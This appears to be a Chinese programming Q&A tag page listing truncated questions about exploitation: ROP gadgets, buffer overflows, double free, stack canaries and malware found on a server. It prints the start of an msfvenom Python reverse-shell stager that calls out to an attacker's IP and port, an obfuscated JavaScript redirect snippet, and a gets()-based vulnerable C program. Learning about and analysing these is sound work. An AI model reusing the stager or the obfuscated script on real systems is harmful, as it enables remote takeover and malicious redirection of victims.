exploit

    -3热度

    1回答

    计算机安全是一个我很长时间避免的大问题,假设它对我的技能水平来说太复杂了。 我开始有点好奇,所以我想知道,是否可以在汇编IDE中打开随机的exe文件(或任何文件),并开始改变它? 我的意思是,这将是肯定很难理解页面和组装的页面,但如果有人/ CAN /,取之于编辑文件,并在一堆指令恶补阻止他们? 假设你能做到这一点,我不知道怎样才能机器代码量以root访问权限?你是否必须从字面上打开操作系统并重新

    1热度

    1回答

    ROP中的直接小工具是什么 - 返回面向编程中的安全漏洞利用技术? 我读一些理论有关的ROPs,近期小工具只能写的,我们有一个指针代码序列: pop %ebx ; ret 指令 pop %ebx 将在未来的DWORD加载到%EBX。 但我不明白它为什么会有用?如果你正在从某个库中加载某些东西,那么你试图获得一些有用的小工具,为什么会有“立即”?

    1热度

    1回答

    ROP中的NOP小工具是什么 - 返回面向编程中的安全漏洞利用技术?我正在阅读关于ROP的一些理论,并且只写了它是指向操作码C3 ret的指针? NOP表示处理器没有操作,当指令指针到达时,处理器实际上什么都不做,但是一个时钟周期到期。

    2热度

    1回答

    我正在寻找一些帮助环绕下我的头: #include <stdlib.h> #include <unistd.h> #include <stdio.h> #include <string.h> int main(int argc, char **argv) {char buffer[70]; gets(buffer);} 我知道这很容易受到缓冲区溢出。它需要92个“A”,然后接下来

    3热度

    2回答

    我在我的服务器上遇到高达1 Gbps的尖峰,一直在寻找病毒和恶意软件。我在/etc/cron.hourly中发现了这个文件:gcc.sh,并想知道是否有人看到过类似的东西,并且会对代码有所了解。谢谢! #!/bin/sh PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/binfor i in

    -3热度

    1回答

    var a = ['document', 'window', String]; var b = '108 111 99 97 116 105 111 110'; var c = '%68%74%74%70%73%3a%2f%2f%77%77%77%2e%74%75%6d%62%6c%72%2e%63%6f%6d'; var d = 'ZnJvbUNoYXJDb2Rl'; var e = '

    1热度

    1回答

    在Linux中,除了金丝雀之外,绕过安全机制(如NX,ASLR)的方法很多。实际上,我发现stackary canary是由/arch/arm/include/asm/stackprotector.h/boot_init_stack_canary()函数中的Linux内核生成的。随机数最终由extract_entropy函数生成,并且与环境噪声有关如键盘,中断的时间间隔。 当利用堆栈溢出漏洞时,是

    -2热度

    1回答

    有人可以解释为什么释放连续两次导致崩溃,但释放第一,然后b,然后再次不会崩溃? 我知道free会将堆块插入双链接空闲列表中。释放两次会在空闲列表中两次插入相同的块。但为什么会发生崩溃? int *a = malloc(8); int *b = malloc(8); free(a); // free(a); //Would crash! free(b); free(a); //No

    0热度

    1回答

    我已经使用msfvenom创建以下蟒蛇有效载荷: import socket,struct s=socket.socket(2,socket.SOCK_STREAM) s.connect(('MY PUBLIC IP',3930)) l=struct.unpack('>I',s.recv(4))[0] d=s.recv(l) while len(d)<l: d+=s.recv(

    0热度

    2回答

    在过去的一段时间里,我一直在修补Web服务器漏洞,并且我在Python中占据了一部分。我用python编写了一个格式不正确的http POST数据,当我将它粘贴到Http Live Headers中并重播请求时,它在100次中运行100次。 问题是,当我尝试删除Replay标头部分,只使用python来完成整个事情,python似乎并没有发送完整的POST命令。 我使用这个: send = soc